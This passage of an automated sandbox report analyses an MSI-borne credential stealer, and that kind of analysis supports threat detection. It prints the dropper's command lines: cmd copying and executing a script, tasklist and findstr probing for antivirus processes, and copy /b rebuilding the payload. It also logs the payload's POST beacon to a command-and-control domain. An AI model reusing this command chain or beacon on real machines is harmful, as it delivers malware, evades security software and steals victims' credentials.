9d e7 Data Ascii: 9fcOb#\|z>+R=]kT[!^L"{F=gOqYr;@Ywtrz b0&zuDSxBw(SYDRsSAdgO5. >bbLM> ?Y>{+^km-6A
2024-07-25 07:54:15 UTC	804	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 07:54:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l65uo6g51d0u78oe5hm2o7vse4; expires=Mon, 18-Nov-2024 01:40:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94T5q0A04pVJJsVrUxT2J2PNYDXq7tBtVtxfUOCV3XBwZLSQm4W65ARGzUSmq%2FzFpr2l1JXjvjiMIslwwNa5k%2FoMll2WXfxmgjG5Bo00IvyC%2F2SW3wYHTHorUMzac7qB%2F%2FRqjksd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8a94adde550cb4-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49729	188.114.96.3	443	3248	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-25 07:54:17 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: warrantelespsz.shop
2024-07-25 07:54:17 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 6c 67 59 39 69 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 45 43 30 44 39 33 45 46 30 44 32 36 37 43 39 42 32 41 42 39 42 34 30 44 35 46 44 36 32 35 33 Data Ascii: act=get_message&ver=4.0&lid=DlgY9i--&j=&hwid=FEC0D93EF0D267C9B2AB9B40D5FD6253
2024-07-25 07:54:18 UTC	804	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 07:54:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j9m04srtk1menth86s9icsj75b; expires=Mon, 18-Nov-2024 01:40:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=py5V%2BTiLgW24WjXEFMJgVM%2BCai2Jp0agHhqEPYgvu72d6Hzgd%2B2A4MYGC%2FaUOF21XT1nZvaunG6JzroTE03dAP3bwWPFxQM2FT%2FVV1JIycrfsp8EXOvDu3IwHfkMG0REdPnZT5zD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8a94c15f2dc33c-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 07:54:18 UTC	54	IN	Data Raw: 33 30 0d 0a 39 67 63 42 71 42 31 65 2b 58 59 63 53 32 6c 56 36 4b 6a 39 66 6d 56 34 36 6b 6a 58 38 4e 5a 69 79 4a 76 68 6e 6a 58 4d 30 6a 57 74 57 67 3d 3d 0d 0a Data Ascii: 309gcBqB1e+XYcS2lV6Kj9fmV46kjX8NZiyJvhnjXM0jWtWg==
2024-07-25 07:54:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	1
Start time:	03:52:27
Start date:	25/07/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NB4EASbynx.msi"
Imagebase:	0x7ff61f270000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:52:28
Start date:	25/07/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff61f270000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	03:52:30
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 4C0B4EE6A62E23CFF044B1F01FFADBEC C
Imagebase:	0x360000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:52:31
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\MSI53B9.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\MSI53B9.tmp" -pqwerty2023 -s1
Imagebase:	0x870000
File size:	1'422'662 bytes
MD5 hash:	689E01A34A731C6F051E39CD55FB71AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:53:00
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\SymposiumTaiwan.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SymposiumTaiwan.exe"
Imagebase:	0x400000
File size:	895'074'384 bytes
MD5 hash:	9A721DDFD6C94D81EF78858A85F1083A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:53:00
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:53:00
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:53:02
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x8a0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:53:02
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0x3a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:53:02
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x8a0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:53:02
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0x3a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:53:03
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 558563
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:53:03
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "cbsinchhavefcc" Basketball
Imagebase:	0x3a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:53:04
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Upc + Beverages + Hero + Displaying + Version + Fm + Emotions 558563\k
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:53:04
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
Wow64 process (32bit):	true
Commandline:	558563\Dicks.pif 558563\k
Imagebase:	0x30000
File size:	893'608 bytes
MD5 hash:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 7%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:53:04
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 5
Imagebase:	0x9a0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:53:09
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 6E4C0896962209942EF6224878A6EC23
Imagebase:	0x360000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:53:57
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
Imagebase:	0x30000
File size:	893'608 bytes
MD5 hash:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3198982673.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3156175797.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3155203388.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3179989281.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.5%
Total number of Nodes:	1504
Total number of Limit Nodes:	26

Executed Functions

Function 0088C131 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 199
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0087F353: GetModuleHandleW.KERNEL32 ref: 0087F36B
Part of subcall function 0087F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0087F383
Part of subcall function 0087F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0087F3A6

Part of subcall function 00888B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00888B96

Part of subcall function 00889036: OleInitialize.OLE32(00000000), ref: 0088904F
Part of subcall function 00889036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00889086
Part of subcall function 00889036: SHGetMalloc.SHELL32(008B20E8), ref: 00889090

Part of subcall function 00880722: GetCPInfo.KERNEL32(00000000,?), ref: 00880733
Part of subcall function 00880722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00880747

GetCommandLineW.KERNEL32 ref: 0088C179
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0088C1A0
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0088C1B1
UnmapViewOfFile.KERNEL32(00000000), ref: 0088C1EB

Part of subcall function 0088BE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088BE20
Part of subcall function 0088BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088BE5C

CloseHandle.KERNEL32(00000000), ref: 0088C1F4
GetModuleFileNameW.KERNEL32(00000000,008C7938,00000800), ref: 0088C20F
SetEnvironmentVariableW.KERNEL32(sfxname,008C7938), ref: 0088C221
GetLocalTime.KERNEL32(?), ref: 0088C228
_swprintf.LIBCMT ref: 0088C267
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0088C279
GetModuleHandleW.KERNEL32(00000000), ref: 0088C27C
LoadIconW.USER32(00000000,00000064), ref: 0088C293
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 0088C2E4
Sleep.KERNEL32(?), ref: 0088C312
DeleteObject.GDI32 ref: 0088C351
DeleteObject.GDI32(?), ref: 0088C35D

Part of subcall function 0088A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 0088A92C
Part of subcall function 0088A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0088A953

CloseHandle.KERNEL32 ref: 0088C39C

Strings

sfxstime, xrefs: 0088C274
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0088C258
sfxname, xrefs: 0088C21C
STARTDLG, xrefs: 0088C2D9
winrarsfxmappingfile.tmp, xrefs: 0088C194

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 985665271-3710569615
Opcode ID: a3c688c7fc75de1ba3cc6000023eec2717be155e02c99514cb918d5769d37d9f
Instruction ID: 51deee4c63a508f772bde9c4278b2135ad9ed4f8392f0a6aa5bafc6b51d0f0bf
Opcode Fuzzy Hash: a3c688c7fc75de1ba3cc6000023eec2717be155e02c99514cb918d5769d37d9f
Instruction Fuzzy Hash: E161E371904310AFE320BB69EC49F6B3BE8FB49751F044429F544D36A2EB789805CBB2

Function 00888BD0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNELBASE(00000066,PNG,?,?,00889AC8,00000066), ref: 00888BE1
SizeofResource.KERNEL32(00000000,751E5780,?,?,00889AC8,00000066), ref: 00888BF9
LoadResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C0C
LockResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C17
GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00889AC8,00000066), ref: 00888C35
GlobalLock.KERNEL32(00000000,?,?,?,00889AC8,00000066), ref: 00888C42
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00888C9D
GlobalUnlock.KERNEL32(00000000), ref: 00888CB2
GlobalFree.KERNEL32(00000000), ref: 00888CB9

Strings

PNG, xrefs: 00888BD2

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: 03d9eb6a713a02cbc3fca7571fd61771e812cb3d4a540e96c1adeb407954ba5b
Instruction ID: 127699b3b6247c5ecde0a2c41533a8ada9ac1cd10b78531a28f57a0291fe92cc
Opcode Fuzzy Hash: 03d9eb6a713a02cbc3fca7571fd61771e812cb3d4a540e96c1adeb407954ba5b
Instruction Fuzzy Hash: FF216F71602602EFE761AF21DD4996BBBA9FF8A791B000528F845C2664EF31DC04DBB1

Function 0087A273 Relevance: 7.6, APIs: 5, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A2A8
FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A2DE
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A2E6
FindNextFileW.KERNEL32(?,?,?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A30E
GetLastError.KERNEL32(?,?,?,?,0087A16E,000000FF,?,?), ref: 0087A31A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 8df4775df3f355a065e27014e8a1d787e3a836bc02dd41e9ea3ef74584d84cb0
Instruction ID: d3ae55a57e08be297b23b88c56970e10a5a01cf7ac5fa08a21f0b663fc4b48bc
Opcode Fuzzy Hash: 8df4775df3f355a065e27014e8a1d787e3a836bc02dd41e9ea3ef74584d84cb0
Instruction Fuzzy Hash: 2C415175608245AFC324EF68C884ADEF7E9FB89350F004A1AF5ADD3240D774E9548B92

Function 00894A5A Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002,00000000), ref: 00894A7B
TerminateProcess.KERNEL32(00000000,?,00894A30,?,008A7F68,0000000C,00894B87,?,00000002,00000000), ref: 00894A82
ExitProcess.KERNEL32 ref: 00894A94

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 70b77aaad5bbfab04cab5839310f23d6da033135ecce8fba728acc4d91e9f556
Instruction ID: 343f0509dedf9459250f4448a254e60e1bfe330d06862efcf83a8e59c5d650b5
Opcode Fuzzy Hash: 70b77aaad5bbfab04cab5839310f23d6da033135ecce8fba728acc4d91e9f556
Instruction Fuzzy Hash: 90E0B631140918AFDF51BF68DD09E893BA9FB51391F091414F9099AA21CB36DD92CB85

Function 00878409 Relevance: 3.9, APIs: 2, Instructions: 888COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0087840E
_memcmp.LIBVCRUNTIME ref: 00878870

Part of subcall function 008780F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,008786E9,?,-00000930,?), ref: 008781BB

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CharH_prologUpper_memcmp
String ID:
API String ID: 4047935103-0
Opcode ID: 950891d690957e33aad25b8920bf7c161aeb2290a3a16b7554e3d97a9dc9a5dc
Instruction ID: 1f1dd7d83af5b2fdd5017d0e1a02657476c34db3db6962b4f184e5fb841a19d8
Opcode Fuzzy Hash: 950891d690957e33aad25b8920bf7c161aeb2290a3a16b7554e3d97a9dc9a5dc
Instruction Fuzzy Hash: D172F571944185EEDF25DF64C889BE9BBA8FF11304F0880B9E95DDB14ADB30DA84CB61

Function 00885984 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 27646c26781a14badac0986e8ee5c57c876c39f6d3edd26049b5c32271f0ecdf
Instruction ID: f562900aa78777c0af2cf400b3d4937ec96d382d3ad26850211d6a9105e10020
Opcode Fuzzy Hash: 27646c26781a14badac0986e8ee5c57c876c39f6d3edd26049b5c32271f0ecdf
Instruction Fuzzy Hash: B5D113B1A087458FDB14EF28C88479ABBE1FF95318F08056DE844DB642D334E959CB9A

Function 00889B4F Relevance: 95.2, APIs: 46, Strings: 8, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00889B54

Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341

Strings

@, xrefs: 00889F0E
<, xrefs: 00889F01
LICENSEDLG, xrefs: 0088A3D4
STARTDLG, xrefs: 00889B73
-el -s2 "-d%s" "-sp%s", xrefs: 00889EE8
"%s"%s, xrefs: 0088A08A
__tmp_rar_sfx_access_check_%u, xrefs: 00889E2E
winrarsfxmappingfile.tmp, xrefs: 00889F23

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-2803697902
Opcode ID: 78fd1134e56c1a7cc3a15fbba7202aa54d6f24ef97007c228dd668e1ff5f73d2
Instruction ID: 12bc32fa261fc2f4c5f8f4c8fdb06bbc573c6b163bba8aae3fd6ca2993e467ad
Opcode Fuzzy Hash: 78fd1134e56c1a7cc3a15fbba7202aa54d6f24ef97007c228dd668e1ff5f73d2
Instruction Fuzzy Hash: 6D421270A40318AEFB25BB689C4AFBE3BA8FB06710F044055F645E65D2D7B59D84CB23

Function 0087F353 Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 0087F36B
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0087F383
